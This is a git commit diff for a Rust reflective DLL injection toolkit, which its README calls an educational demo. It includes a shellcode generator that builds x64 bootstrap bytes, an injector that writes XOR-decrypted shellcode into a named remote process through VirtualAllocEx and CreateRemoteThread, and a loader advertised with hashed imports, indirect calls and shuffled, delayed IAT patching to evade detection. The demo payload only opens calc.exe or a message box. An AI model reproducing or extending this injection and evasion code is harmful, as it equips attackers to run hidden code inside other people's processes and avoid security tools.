update name change to docs

Cargo.lock

@@ -3,41 +3,7 @@
 version = 3
 
 [[package]]
-name = "airborne-generator"
+name = "airborne-common"
-version = "0.1.0"
-dependencies = [
- "airborne-utils",
- "clap",
- "rand",
- "windows-sys",
-]
-
-[[package]]
-name = "airborne-injector"
-version = "0.1.0"
-dependencies = [
- "airborne-utils",
- "lexopt",
- "windows-sys",
-]
-
-[[package]]
-name = "airborne-payload"
-version = "0.1.0"
-dependencies = [
- "windows-sys",
-]
-
-[[package]]
-name = "airborne-reflective_loader"
-version = "0.1.0"
-dependencies = [
- "airborne-utils",
- "windows-sys",
-]
-
-[[package]]
-name = "airborne-utils"
 version = "0.1.0"
 
 [[package]]
@@ -140,6 +106,16 @@ version = "1.0.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "acbf1af155f9b9ef647e42cdc158db4b64a1b61f743629225fde6f3e0be2a7c7"
 
+[[package]]
+name = "generator"
+version = "0.1.0"
+dependencies = [
+ "airborne-common",
+ "clap",
+ "rand",
+ "windows-sys",
+]
+
 [[package]]
 name = "getrandom"
 version = "0.2.12"
@@ -169,6 +145,22 @@ version = "0.2.152"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "13e3bf6590cbc649f4d1a3eefc9d5d6eb746f5200ffb04e5e142700b8faa56e7"
 
+[[package]]
+name = "poc-injector"
+version = "0.1.0"
+dependencies = [
+ "airborne-common",
+ "lexopt",
+ "windows-sys",
+]
+
+[[package]]
+name = "poc-payload"
+version = "0.1.0"
+dependencies = [
+ "windows-sys",
+]
+
 [[package]]
 name = "ppv-lite86"
 version = "0.2.17"
@@ -223,6 +215,14 @@ dependencies = [
  "getrandom",
 ]
 
+[[package]]
+name = "reflective-loader"
+version = "0.1.0"
+dependencies = [
+ "airborne-common",
+ "windows-sys",
+]
+
 [[package]]
 name = "strsim"
 version = "0.10.0"

Cargo.toml

@@ -6,7 +6,7 @@ members = [
     "payload",
     "generator",
     "reflective_loader", 
-    "utils"
+    "common"
 ]
 
 [profile.release]

README.md

@@ -9,30 +9,55 @@ Reflective DLL injection demo for fun and education. In practical applications,
 ```shell
 .
 ├── generator           # Shellcode generator (ties together bootstrap, loader, payload, and user data)
-├── injector            # PoC injector
+├── injector            # PoC injector (CreateRemoteThread)
-├── payload             # PoC payload (DllMain and PrintMessage)
+├── payload             # PoC payload (calc.exe or MessageBoxW based on generator's flag)
-└── reflective_loader   # sRDI implementation
+├── reflective_loader   # sRDI implementation
+└── common              # Common XOR and hashing functions
 ```
 
 ### Features
 
-- Compact filesize (~14 kB)
+- ~14 kB reflective loader
 - Hashed import names & indirect function calls
-- Randomized payload export iteration & IAT patching
+- XOR encrypted payload shellcode
-- XOR encryption for shellcode (shellcode generation specific keys)
+- Shuffled and delayed IDT iteration (during IAT patching)
-
-Check out [Alcatraz](https://github.com/weak1337/Alcatraz/) for additional obfuscation for the shellcode/injector.
 
 ### Usage
 
-The following command compiles the DLLs and executables into `target`:
+The following command compiles the DLLs and executables into `target/release/`:
 
 ```shell
 $ cargo build --release
 ```
 
-1. Generate shellcode containing the loader and the payload
+1. Generate shellcode containing the loader and the payload:
-2. Inject the created shellcode into target
+
+```
+Usage: generator.exe [OPTIONS] --loader <LOADER_PATH> --payload <PAYLOAD_PATH> --function <FUNCTION_NAME> --parameter <PARAMETER> --output <OUTPUT_PATH>
+
+Options:
+  -l, --loader <LOADER_PATH>      Path to the sRDI loader DLL
+  -p, --payload <PAYLOAD_PATH>    Path to the payload DLL
+  -f, --function <FUNCTION_NAME>  Name of the function to call in the payload DLL
+  -n, --parameter <PARAMETER>     Parameter to pass to the function
+  -o, --output <OUTPUT_PATH>      Path to the output file
+      --flag <FLAG>               Flag to pass to the loader (by default DllMain is called) [default: 0]
+  -h, --help                      Print help
+  -V, --version                   Print version
+```
+
+2. Inject the created shellcode into target:
+
+```
+Usage: poc-injector.exe -p <PROCESS_NAME> -s <SHELLCODE_PATH> -k <KEYFILE_PATH>
+```
+
+3. Depending on the flag passed to the generator, either `DllMain` with `DLL_PROCESS_ATTACH` or user function with custom parameter is called:
+
+<div align="center">
+    <img src=".github/docs/dllmain-exec.png" alt="Payload's DllMain execution with the default flag (0)" width="90%">
+    <img src=".github/docs/userfunction-exec.png" alt="Payload's user defined function execution with the modified flag (1)" width="90%">
+</div>
 
 ### Disclaimer
 

common/Cargo.toml

@@ -1,5 +1,5 @@
 [package]
-name = "airborne-utils"
+name = "airborne-common"
 version = "0.1.0"
 edition = "2021"
 

common/src/lib.rs

@@ -2,8 +2,44 @@
 
 // gen_xor_key isn't required to be a shared module, as it's only used in the shellcode generator
 
+const DELAY_FLAG: u32 = 0b0001;
+const SHUFFLE_FLAG: u32 = 0b0010;
+const UFN_FLAG: u32 = 0b0100;
+
 const HASH_KEY: usize = 5381;
 
+pub struct Flags {
+    pub delay: bool,
+    pub shuffle: bool,
+    pub ufn: bool,
+}
+
+pub fn parse_u32_flag(flag: u32) -> Flags {
+    Flags {
+        delay: flag & DELAY_FLAG != 0,
+        shuffle: flag & SHUFFLE_FLAG != 0,
+        ufn: flag & UFN_FLAG != 0,
+    }
+}
+
+pub fn create_u32_flag(delay: bool, shuffle: bool, ufn: bool) -> u32 {
+    let mut flags = 0;
+
+    if delay {
+        flags |= DELAY_FLAG;
+    }
+
+    if shuffle {
+        flags |= SHUFFLE_FLAG;
+    }
+
+    if ufn {
+        flags |= UFN_FLAG;
+    }
+
+    flags
+}
+
 pub fn xor_cipher(data: &mut [u8], key: &[u8]) {
     for (i, byte) in data.iter_mut().enumerate() {
         *byte ^= key[i % key.len()];

generator/Cargo.toml

@@ -1,12 +1,12 @@
 [package]
-name = "airborne-generator"
+name = "generator"
 version = "0.1.0"
 edition = "2021"
 
 [dependencies]
-clap = {version = "4.4.18", features = ["derive"] }
+clap = { version = "4.4.18", features = ["derive"] }
 rand = "0.8.5"
-airborne-utils = { path = "../utils" }
+airborne-common = { path = "../common" }
 
 [dependencies.windows-sys]
 version = "0.52.0"

generator/src/main.rs

@@ -1,7 +1,10 @@
-use std::{collections::BTreeMap, ffi::CStr, fs, path::PathBuf, slice::from_raw_parts};
+use std::{
+    collections::BTreeMap, error::Error, ffi::CStr, fs, path::PathBuf, process::exit,
+    slice::from_raw_parts,
+};
 
-use airborne_utils::calc_hash;
+use airborne_common::calc_hash;
-use clap::Parser;
+use clap::{ArgAction, Parser};
 use windows_sys::Win32::{
     System::Diagnostics::Debug::IMAGE_NT_HEADERS64,
     System::{
@@ -28,9 +31,15 @@ struct Args {
     /// Path to the output file
     #[arg(short, long = "output")]
     output_path: PathBuf,
-    /// Flag to pass to the loader (by default DllMain is called)
+    /// Disable randomized delays during IAT patching
-    #[arg(short, long, default_value_t = 0)]
+    #[arg(short, long, action = ArgAction::SetFalse, default_value_t = true)]
-    flag: u32, // preferably set type as u32 here instead of casting it when generating bootstrap
+    no_delay: bool,
+    /// Disable IAT import descriptor shuffling
+    #[arg(short, long, action = ArgAction::SetFalse, default_value_t = true)]
+    no_shuffle: bool,
+    /// Call payload's user defined function instead of DllMain
+    #[arg(short, long, action = ArgAction::SetTrue, default_value_t = false)]
+    ufn: bool,
 }
 
 // NOTE: must be updated accordingly if the loader name or the bootstrap code is modified
@@ -40,9 +49,13 @@ const BOOTSTRAP_TOTAL_LENGTH: u32 = 79;
 fn main() {
     let args = Args::parse();
 
+    // (bool, bool, bool) -(OR)-> u32
+    let combined_flag = airborne_common::create_u32_flag(args.no_delay, args.no_shuffle, args.ufn);
+
     // preserve the path from being dropped
     let output_path = args.output_path.clone();
 
+    // prepare paths for pretty printing
     let loader_path_str = args.loader_path.to_str().unwrap();
     let payload_path_str = args.payload_path.to_str().unwrap();
     let output_path_str = args.output_path.to_str().unwrap();
@@ -51,29 +64,66 @@ fn main() {
     println!("[+] payload: {}", payload_path_str);
     println!("[+] output: {}", output_path_str);
 
-    let mut loader_b = fs::read(args.loader_path).expect("failed to read sRDI DLL");
+    let mut loader_b = match fs::read(args.loader_path) {
-    let mut payload_b = fs::read(args.payload_path).expect("failed to read payload DLL");
+        Ok(b) => b,
+        Err(e) => {
+            eprintln!("[-] failed to read loader DLL: {}", e);
+            exit(1);
+        }
+    };
+
+    let mut payload_b = match fs::read(args.payload_path) {
+        Ok(b) => b,
+        Err(e) => {
+            eprintln!("[-] failed to read payload DLL: {}", e);
+            exit(1);
+        }
+    };
     let function_hash = calc_hash(args.function_name.as_bytes());
 
-    let mut shellcode = gen_sc(
+    let mut shellcode = match gen_sc(
         &mut loader_b,
         &mut payload_b,
         function_hash,
         args.parameter,
-        args.flag,
+        combined_flag,
-    );
+    ) {
+        Ok(sc) => sc,
+        Err(e) => {
+            eprintln!("[-] failed to generate shellcode: {}", e);
+            exit(1);
+        }
+    };
 
     println!("\n[+] xor'ing shellcode");
     let key = gen_xor_key(shellcode.len());
-    airborne_utils::xor_cipher(&mut shellcode, &key);
+    airborne_common::xor_cipher(&mut shellcode, &key);
     let mut key_output_path = output_path.clone().into_os_string();
     key_output_path.push(".key");
+
+    // prepare path for pretty printing
     let key_output_path_str = key_output_path.to_str().unwrap();
 
-    println!("\n[+] writing shellcode to '{}'", output_path_str);
+    println!(
-    fs::write(output_path, shellcode).expect("failed to write shellcode to output file");
+        "\n[+] writing shellcode to '{}' and xor key to '{}'",
-    println!("[+] writing xor key to '{}'", key_output_path_str);
+        output_path_str, key_output_path_str
-    fs::write(key_output_path, key).expect("failed to write xor key to output file");
+    );
+
+    match fs::write(output_path, shellcode) {
+        Ok(_) => (),
+        Err(e) => {
+            eprintln!("[-] failed to write shellcode to output file: {}", e);
+            exit(1);
+        }
+    };
+
+    match fs::write(key_output_path, key) {
+        Ok(_) => (),
+        Err(e) => {
+            eprintln!("[-] failed to write xor key to output file: {}", e);
+            exit(1);
+        }
+    };
 }
 
 fn gen_sc(
@@ -82,159 +132,117 @@ fn gen_sc(
     function_hash: u32,
     parameter: String,
     flag: u32,
-) -> Vec<u8> {
+) -> Result<Vec<u8>, Box<dyn Error>> {
-    let loader_addr = export_ptr_by_name(loader_b.as_mut_ptr(), LOADER_ENTRY_NAME)
+    let loader_addr = export_ptr_by_name(loader_b.as_mut_ptr(), LOADER_ENTRY_NAME)?;
-        .expect("failed to get loader entry point");
     let loader_offset = loader_addr as usize - loader_b.as_mut_ptr() as usize;
     println!("[+] loader offset: {:#x}", loader_offset);
 
     // 64-bit bootstrap source: https:// github.com/memN0ps/srdi-rs/blob/main/generate_shellcode
 
-    // TODO: clean up & fix 'call to push immediately after creation' compiler warning by
-    //       calculating little-endian representations of variables (flag, parameter length & offset,
-    //       function hash, payload offset, loader address) beforehand
-
-    let mut bootstrap: Vec<u8> = Vec::new();
-
-    /*
-        1.) save the current location in memory for calculating offsets later
-    */
-
-    // call 0x00 (this will push the address of the next function to the stack)
-    bootstrap.push(0xe8);
-    bootstrap.push(0x00);
-    bootstrap.push(0x00);
-    bootstrap.push(0x00);
-    bootstrap.push(0x00);
-
-    // pop rcx - this will pop the value we saved on the stack into rcx to capture our current location in memory
-    bootstrap.push(0x59);
-
-    // mov r8, rcx - copy the value of rcx into r8 before we start modifying RCX
-    bootstrap.push(0x49);
-    bootstrap.push(0x89);
-    bootstrap.push(0xc8);
-
-    /*
-        2.) align the stack and create shadow space
-    */
-
-    // push rsi - save original value
-    bootstrap.push(0x56);
-
-    // mov rsi, rsp - store our current stack pointer for later
-    bootstrap.push(0x48);
-    bootstrap.push(0x89);
-    bootstrap.push(0xe6);
-
-    // and rsp, 0x0FFFFFFFFFFFFFFF0 - align the stack to 16 bytes
-    bootstrap.push(0x48);
-    bootstrap.push(0x83);
-    bootstrap.push(0xe4);
-    bootstrap.push(0xf0);
-
-    // sub rsp, 0x30 (48 bytes) - create shadow space on the stack, which is required for x64. A minimum of 32 bytes for rcx, rdx, r8, r9. Then other params on stack
-    bootstrap.push(0x48);
-    bootstrap.push(0x83);
-    bootstrap.push(0xec);
-    bootstrap.push(6 * 8); // 6 args that are 8 bytes each
-
-    /*
-        3.) setup reflective loader parameters: place the last 5th and 6th arguments on the stack (rcx, rdx, r8, and r9 are already on the stack as the first 4 arguments)
-    */
-
-    // mov qword ptr [rsp + 0x20], rcx (shellcode base + 5 bytes) - (32 bytes) Push in arg 5
-    bootstrap.push(0x48);
-    bootstrap.push(0x89);
-    bootstrap.push(0x4C);
-    bootstrap.push(0x24);
-    bootstrap.push(4 * 8); // 5th arg
-
-    // sub qword ptr [rsp + 0x20], 0x5 (shellcode base) - modify the 5th arg to get the real shellcode base
-    bootstrap.push(0x48);
-    bootstrap.push(0x83);
-    bootstrap.push(0x6C);
-    bootstrap.push(0x24);
-    bootstrap.push(4 * 8); // 5th arg
-    bootstrap.push(5); // minus 5 bytes because call 0x00 is 5 bytes to get the allocate memory from VirtualAllocEx from injector
-
-    // mov dword ptr [rsp + 0x28], <flag> - (40 bytes) Push arg 6 just above shadow space
-    bootstrap.push(0xC7);
-    bootstrap.push(0x44);
-    bootstrap.push(0x24);
-    bootstrap.push(5 * 8); // 6th arg
-    bootstrap.append(&mut flag.to_le_bytes().to_vec().clone());
-
-    /*
-        4.) setup reflective loader parameters: 1st -> rcx, 2nd -> rdx, 3rd -> r8, 4th -> r9
-    */
-
-    // mov r9, <parameter_length> - copy the 4th parameter, which is the length of the user data into r9
-    bootstrap.push(0x41);
-    bootstrap.push(0xb9);
-    let parameter_length = parameter.len() as u32; // This must u32 or it breaks assembly
-    bootstrap.append(&mut parameter_length.to_le_bytes().to_vec().clone());
-
-    // add r8, <parameter_offset> + <payload_length> - copy the 3rd parameter, which is address of the user function into r8 after calculation
-    bootstrap.push(0x49);
-    bootstrap.push(0x81);
-    bootstrap.push(0xc0); // minus 5 because of the call 0x00 instruction
     let parameter_offset =
-        (BOOTSTRAP_TOTAL_LENGTH - 5) + loader_b.len() as u32 + payload_b.len() as u32;
+        BOOTSTRAP_TOTAL_LENGTH - 5 + loader_b.len() as u32 + payload_b.len() as u32;
-    bootstrap.append(&mut parameter_offset.to_le_bytes().to_vec().clone());
+    let payload_offset = BOOTSTRAP_TOTAL_LENGTH - 5 + loader_b.len() as u32;
 
-    // mov edx, <prameter_hash> - copy the 2nd parameter, which is the hash of the user function into edx
+    // 1.) save the current location in memory for calculating offsets later
-    bootstrap.push(0xba);
+    let b1: Vec<u8> = vec![
-    bootstrap.append(&mut function_hash.to_le_bytes().to_vec().clone());
+        0xe8, 0x00, 0x00, 0x00, 0x00, // call 0x00
+        0x59, // pop rcx
+        0x49, 0x89, 0xc8, // mov r8, rcx
+    ];
 
-    // add rcx, <payload_offset> - copy the 1st parameter, which is the address of the user dll into rcx after calculation
+    // 2.) align the stack and create shadow space
-    bootstrap.push(0x48);
+    let b2: Vec<u8> = vec![
-    bootstrap.push(0x81);
+        0x56, // push rsi
-    bootstrap.push(0xc1); // minus 5 because of the call 0x00 instruction
+        0x48,
-    let payload_offset = (BOOTSTRAP_TOTAL_LENGTH - 5) + loader_b.len() as u32; // mut be u32 or it breaks assembly
+        0x89,
-    bootstrap.append(&mut payload_offset.to_le_bytes().to_vec().clone());
+        0xe6, // mov rsi, rsp
+        0x48,
+        0x83,
+        0xe4,
+        0xf0, // and rsp, 0x0FFFFFFFFFFFFFFF0
+        0x48,
+        0x83,
+        0xec,
+        6 * 8, // sub rsp, 0x30
+    ];
 
-    /*
+    // 3.) setup reflective loader parameters: place the last 5th and 6th arguments on the stack
-        5.) call the reflective loader
+    let b3: Vec<u8> = vec![
-    */
+        0x48,
+        0x89,
+        0x4C,
+        0x24,
+        4 * 8, // mov qword ptr [rsp + 0x20], rcx
+        0x48,
+        0x83,
+        0x6C,
+        0x24,
+        4 * 8,
+        5, // sub qword ptr [rsp + 0x20], 0x5
+        0xC7,
+        0x44,
+        0x24,
+        5 * 8, // mov dword ptr [rsp + 0x28], <flag>
+    ]
+    .into_iter()
+    .chain(flag.to_le_bytes().to_vec())
+    .collect();
 
-    // call <loader_offset> - call the reflective loader address after calculation
+    // 4.) setup reflective loader parameters: 1st -> rcx, 2nd -> rdx, 3rd -> r8, 4th -> r9
-    bootstrap.push(0xe8);
+    let b4: Vec<u8> = vec![0x41, 0xb9]
-    let loader_address =
+        .into_iter()
-        (BOOTSTRAP_TOTAL_LENGTH - bootstrap.len() as u32 - 4) + loader_offset as u32; // must be u32 or it breaks assembly
+        .chain((parameter.len() as u32).to_le_bytes().to_vec())
-    bootstrap.append(&mut loader_address.to_le_bytes().to_vec().clone());
+        .chain(vec![
+            0x49, 0x81, 0xc0, // add r8, <parameter_offset> + <payload_length>
+        ])
+        .chain(parameter_offset.to_le_bytes().to_vec())
+        .chain(vec![
+            0xba, // mov edx, <prameter_hash>
+        ])
+        .chain(function_hash.to_le_bytes().to_vec())
+        .chain(vec![
+            0x48, 0x81, 0xc1, // add rcx, <payload_offset>
+        ])
+        .chain(payload_offset.to_le_bytes().to_vec())
+        .collect();
 
-    // padding
+    // 5.) call the reflective loader
-    bootstrap.push(0x90);
+    let bootstrap_len = b1.len() + b2.len() + b3.len() + b4.len() + 1;
-    bootstrap.push(0x90);
+    let loader_addr = (BOOTSTRAP_TOTAL_LENGTH - bootstrap_len as u32 - 4) + loader_offset as u32;
+    let b5: Vec<u8> = vec![
+        0xe8, // call <loader_offset>
+    ]
+    .into_iter()
+    .chain(loader_addr.to_le_bytes().to_vec())
+    .chain(vec![
+        0x90, 0x90, // padding
+    ])
+    .collect();
 
-    /*
+    // 6.) restore the stack and return to the original location (caller)
-        6.) restore the stack and return to the original location (caller)
+    let b6: Vec<u8> = vec![
-    */
+        0x48, 0x89, 0xf4, // mov rsp, rsi
+        0x5e, // pop rsi
+        0xc3, // ret
+        0x90, 0x90, // padding
+    ];
 
-    // mov rsp, rsi - reset original stack pointer
+    let mut bootstrap: Vec<u8> = b1
-    bootstrap.push(0x48);
+        .into_iter()
-    bootstrap.push(0x89);
+        .chain(b2)
-    bootstrap.push(0xf4);
+        .chain(b3)
-
+        .chain(b4)
-    // pop rsi - put things back where they were left
+        .chain(b5)
-    bootstrap.push(0x5e);
+        .chain(b6)
-
+        .collect();
-    // ret - return to caller and resume execution flow (avoids crashing process)
-    bootstrap.push(0xc3);
-
-    // padding
-    bootstrap.push(0x90);
-    bootstrap.push(0x90);
 
     if bootstrap.len() != BOOTSTRAP_TOTAL_LENGTH as usize {
-        panic!("Bootstrap length is not correct, please modify the BOOTSTRAP_TOTAL_LEN constant in the source");
+        return Err("invalid bootstrap length".into());
-    } else {
-        println!("[+] bootstrap size: {}", bootstrap.len());
     }
 
-    println!("[+] reflective loader size: {}", loader_b.len());
+    println!("[+] bootstrap size: {} bytes", bootstrap.len());
-    println!("[+] payload size: {}", payload_b.len());
+    println!("[+] reflective loader size: {} kB", loader_b.len() / 1024);
+    println!("[+] payload size: {} kB", payload_b.len() / 1024);
 
     let mut shellcode = Vec::new();
 
@@ -251,7 +259,7 @@ fn gen_sc(
             - user data
     */
 
-    println!("\n[+] total shellcode size: {}", shellcode.len());
+    println!("\n[+] total shellcode size: {} kB", shellcode.len() / 1024);
     println!("\n[+] loader(payload_dll_ptr: *mut c_void, function_hash: u32, user_data_ptr: *mut c_void, user_data_len: u32, shellcode_bin_ptr: *mut c_void, flag: u32)");
     println!(
         "[+] arg1: rcx, arg2: rdx, arg3: r8, arg4: r9, arg5: [rsp + 0x20], arg6: [rsp + 0x28]"
@@ -265,7 +273,7 @@ fn gen_sc(
         flag
     );
 
-    shellcode
+    Ok(shellcode)
 }
 
 fn gen_xor_key(keysize: usize) -> Vec<u8> {
@@ -278,61 +286,64 @@ fn gen_xor_key(keysize: usize) -> Vec<u8> {
     key
 }
 
-fn export_ptr_by_name(base_ptr: *mut u8, name: &str) -> Option<*mut u8> {
+fn export_ptr_by_name(base_ptr: *mut u8, name: &str) -> Result<*mut u8, Box<dyn Error>> {
-    for (e_name, addr) in unsafe { get_exports(base_ptr) } {
+    for (e_name, addr) in unsafe { get_exports(base_ptr)? } {
         if e_name == name {
-            return Some(addr as _);
+            return Ok(addr as _);
         }
     }
 
-    None
+    Err(format!("failed to find export by name: {}", name).into())
 }
 
-unsafe fn get_exports(base_ptr: *mut u8) -> BTreeMap<String, usize> {
+unsafe fn get_exports(base_ptr: *mut u8) -> Result<BTreeMap<String, usize>, Box<dyn Error>> {
     let mut exports = BTreeMap::new();
 
     let dos_header_ptr = base_ptr as *mut IMAGE_DOS_HEADER;
 
     if (*dos_header_ptr).e_magic != IMAGE_DOS_SIGNATURE {
-        panic!("Failed to get DOS header");
+        return Err("failed to get DOS header for the export".into());
     }
 
     let nt_header_ptr = rva_mut::<IMAGE_NT_HEADERS64>(base_ptr, (*dos_header_ptr).e_lfanew as _);
+
     let export_dir_ptr = rva_to_offset(
         base_ptr as _,
         &*nt_header_ptr,
         (*nt_header_ptr).OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT as usize]
             .VirtualAddress,
-    ) as *mut IMAGE_EXPORT_DIRECTORY;
+    )? as *mut IMAGE_EXPORT_DIRECTORY;
 
     let export_names = from_raw_parts(
         rva_to_offset(
             base_ptr as _,
             &*nt_header_ptr,
             (*export_dir_ptr).AddressOfNames,
-        ) as *const u32,
+        )? as *const u32,
         (*export_dir_ptr).NumberOfNames as _,
     );
+
     let export_functions = from_raw_parts(
         rva_to_offset(
             base_ptr as _,
             &*nt_header_ptr,
             (*export_dir_ptr).AddressOfFunctions,
-        ) as *const u32,
+        )? as *const u32,
         (*export_dir_ptr).NumberOfFunctions as _,
     );
+
     let export_ordinals = from_raw_parts(
         rva_to_offset(
             base_ptr as _,
             &*nt_header_ptr,
             (*export_dir_ptr).AddressOfNameOrdinals,
-        ) as *const u16,
+        )? as *const u16,
         (*export_dir_ptr).NumberOfNames as _,
     );
 
     for i in 0..(*export_dir_ptr).NumberOfNames as usize {
         let export_name =
-            rva_to_offset(base_ptr as _, &*nt_header_ptr, export_names[i]) as *const i8;
+            rva_to_offset(base_ptr as _, &*nt_header_ptr, export_names[i])? as *const i8;
 
         if let Ok(export_name) = CStr::from_ptr(export_name).to_str() {
             let export_ordinal = export_ordinals[i] as usize;
@@ -342,19 +353,23 @@ unsafe fn get_exports(base_ptr: *mut u8) -> BTreeMap<String, usize> {
                     base_ptr as _,
                     &*nt_header_ptr,
                     export_functions[export_ordinal],
-                ),
+                )?,
             );
         }
     }
 
-    exports
+    Ok(exports)
 }
 
 fn rva_mut<T>(base_ptr: *mut u8, rva: usize) -> *mut T {
     (base_ptr as usize + rva) as *mut T
 }
 
-unsafe fn rva_to_offset(base: usize, nt_header_ref: &IMAGE_NT_HEADERS64, mut rva: u32) -> usize {
+unsafe fn rva_to_offset(
+    base: usize,
+    nt_header_ref: &IMAGE_NT_HEADERS64,
+    mut rva: u32,
+) -> Result<usize, Box<dyn Error>> {
     let section_header_ptr = rva_mut::<IMAGE_SECTION_HEADER>(
         &nt_header_ref.OptionalHeader as *const _ as _,
         nt_header_ref.FileHeader.SizeOfOptionalHeader as _,
@@ -371,9 +386,9 @@ unsafe fn rva_to_offset(base: usize, nt_header_ref: &IMAGE_NT_HEADERS64, mut rva
             rva -= (*section_header_ptr.add(i)).VirtualAddress;
             rva += (*section_header_ptr.add(i)).PointerToRawData;
 
-            return base + rva as usize;
+            return Ok(base + rva as usize);
         }
     }
 
-    0
+    Err(format!("failed to find section for RVA {:#x}", rva).into())
 }

injector/Cargo.toml

@@ -1,11 +1,11 @@
 [package]
-name = "airborne-injector"
+name = "poc-injector"
 version = "0.1.0"
 edition = "2021"
 
 [dependencies]
 lexopt = "0.3.0"
-airborne-utils = { path = "../utils" }
+airborne-common = { path = "../common" }
 
 [dependencies.windows-sys]
 version = "0.52.0"

injector/src/inject.rs

@@ -1,4 +1,4 @@
-use std::{mem::transmute, ptr::null_mut};
+use std::{error::Error, mem::transmute, ptr::null_mut};
 
 use windows_sys::Win32::{
     Foundation::{CloseHandle, INVALID_HANDLE_VALUE},
@@ -9,13 +9,13 @@ use windows_sys::Win32::{
     },
 };
 
-pub unsafe fn inject(pid: u32, dll_vec: Vec<u8>) {
+pub unsafe fn inject(pid: u32, dll_vec: Vec<u8>) -> Result<(), Box<dyn Error>> {
     let dll_len = dll_vec.len();
 
     let h_process = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
 
     if h_process == INVALID_HANDLE_VALUE {
-        panic!("failed to open process");
+        return Err(format!("failed to open process {}", pid).into());
     }
 
     let base_addr_ptr = VirtualAllocEx(
@@ -27,7 +27,7 @@ pub unsafe fn inject(pid: u32, dll_vec: Vec<u8>) {
     );
 
     if base_addr_ptr.is_null() {
-        panic!("failed to allocate memory");
+        return Err(format!("failed to allocate memory into process {}", pid).into());
     }
 
     println!("[+] allocated memory at {:p}", base_addr_ptr);
@@ -40,7 +40,7 @@ pub unsafe fn inject(pid: u32, dll_vec: Vec<u8>) {
         null_mut(),
     ) == 0
     {
-        panic!("failed to write process memory");
+        return Err(format!("failed to write process memory into process {}", pid).into());
     }
 
     let h_thread = CreateRemoteThread(
@@ -54,9 +54,11 @@ pub unsafe fn inject(pid: u32, dll_vec: Vec<u8>) {
     );
 
     if h_thread == INVALID_HANDLE_VALUE {
-        panic!("failed to create remote thread");
+        return Err(format!("failed to create remote thread into process {}", pid).into());
     }
 
     CloseHandle(h_thread);
     CloseHandle(h_process);
+
+    Ok(())
 }

injector/src/main.rs

@@ -15,24 +15,51 @@ struct Args {
 
 fn main() {
     let args = parse_args();
-    let proc_id =
+    let proc_id = unsafe {
-        unsafe { process::iterate_procs(&args.procname).expect("failed to find matching PID") };
+        match process::iterate_procs(&args.procname) {
+            Ok(Some(pid)) => pid,
+            Ok(None) => {
+                println!("[!] process with name {} not found", args.procname);
+                exit(1);
+            }
+            Err(e) => {
+                println!("[!] error during process iteration: {}", e);
+                exit(1);
+            }
+        }
+    };
 
-    let mut shellcode = fs::read(&args.shellcode_path).expect("failed to read shellcode");
+    let mut shellcode = match fs::read(&args.shellcode_path) {
+        Ok(shellcode) => shellcode,
+        Err(e) => {
+            println!("[!] failed to read shellcode: {}", e);
+            exit(1);
+        }
+    };
+
+    let keyfile = match fs::read(&args.keyfile_path) {
+        Ok(keyfile) => keyfile,
+        Err(e) => {
+            println!("[!] failed to read xor keyfile: {}", e);
+            exit(1);
+        }
+    };
 
     if args.offset >= shellcode.len() {
         println!("[!] offset is greater or equal than shellcode length");
         exit(1);
     }
 
-    let keyfile = fs::read(&args.keyfile_path).expect("failed to read keyfile");
     println!("[+] xor'ing shellcode");
-    airborne_utils::xor_cipher(&mut shellcode, &keyfile);
+    airborne_common::xor_cipher(&mut shellcode, &keyfile);
 
     println!("[+] injecting shellcode into {}", args.procname);
-    unsafe { inject::inject(proc_id, shellcode) };
+    unsafe {
-
+        match inject::inject(proc_id, shellcode) {
-    println!("[+] done");
+            Ok(_) => println!("[+] done"),
+            Err(e) => println!("[!] failure during injection: {}", e),
+        }
+    };
 }
 
 fn parse_args() -> Args {
@@ -85,5 +112,5 @@ fn parse_args() -> Args {
 }
 
 fn print_usage() {
-    println!("Usage: injector.exe -p <process_name> -s <shellcode_path> -k <keyfile_path>");
+    println!("Usage: poc-injector.exe -p <PROCESS_NAME> -s <SHELLCODE_PATH> -k <KEYFILE_PATH>");
 }

injector/src/process.rs

@@ -1,4 +1,4 @@
-use std::ffi::CStr;
+use std::{error::Error, ffi::CStr};
 
 use windows_sys::Win32::{
     Foundation::{CloseHandle, INVALID_HANDLE_VALUE},
@@ -7,31 +7,31 @@ use windows_sys::Win32::{
     },
 };
 
-fn snapshot() -> isize {
+fn snapshot() -> Result<isize, Box<dyn Error>> {
     let snapshot = unsafe { CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) };
 
     if snapshot == INVALID_HANDLE_VALUE {
-        panic!("failed to create snapshot");
+        return Err("failed to create toolhelp snapshot".into());
     }
 
-    snapshot
+    Ok(snapshot)
 }
 
-unsafe fn first_proc_entry(snapshot: isize) -> PROCESSENTRY32 {
+unsafe fn first_proc_entry(snapshot: isize) -> Result<PROCESSENTRY32, Box<dyn Error>> {
     let mut pe: PROCESSENTRY32 = std::mem::zeroed();
     pe.dwSize = std::mem::size_of::<PROCESSENTRY32>() as _;
 
     if Process32First(snapshot, &mut pe) == 0 {
         CloseHandle(snapshot);
-        panic!("failed to get first process entry");
+        return Err("failed to get first process entry".into());
     }
 
-    pe
+    Ok(pe)
 }
 
-pub unsafe fn iterate_procs(target_name: &str) -> Option<u32> {
+pub unsafe fn iterate_procs(target_name: &str) -> Result<Option<u32>, Box<dyn Error>> {
-    let snapshot = snapshot();
+    let snapshot = snapshot()?;
-    let mut pe = first_proc_entry(snapshot);
+    let mut pe = first_proc_entry(snapshot)?;
 
     loop {
         let proc_name = CStr::from_ptr(pe.szExeFile.as_ptr() as _)
@@ -43,14 +43,15 @@ pub unsafe fn iterate_procs(target_name: &str) -> Option<u32> {
             println!("[+] {}: {}", pid, proc_name);
             CloseHandle(snapshot);
 
-            return Some(pid);
+            return Ok(Some(pid));
-        } else if Process32Next(snapshot, &mut pe) == 0 {
+        }
+
+        if Process32Next(snapshot, &mut pe) == 0 {
             break;
         }
     }
 
-    println!("[-] process with name {} not found", target_name);
     CloseHandle(snapshot);
 
-    None
+    Ok(None)
 }

payload/Cargo.toml

@@ -1,5 +1,5 @@
 [package]
-name = "airborne-payload"
+name = "poc-payload"
 version = "0.1.0"
 edition = "2021"
 

reflective_loader/Cargo.toml

@@ -1,5 +1,5 @@
 [package]
-name = "airborne-reflective_loader"
+name = "reflective-loader"
 version = "0.1.0"
 edition = "2021"
 
@@ -7,7 +7,7 @@ edition = "2021"
 crate-type = ["cdylib"]
 
 [dependencies]
-airborne-utils = { path = "../utils" }
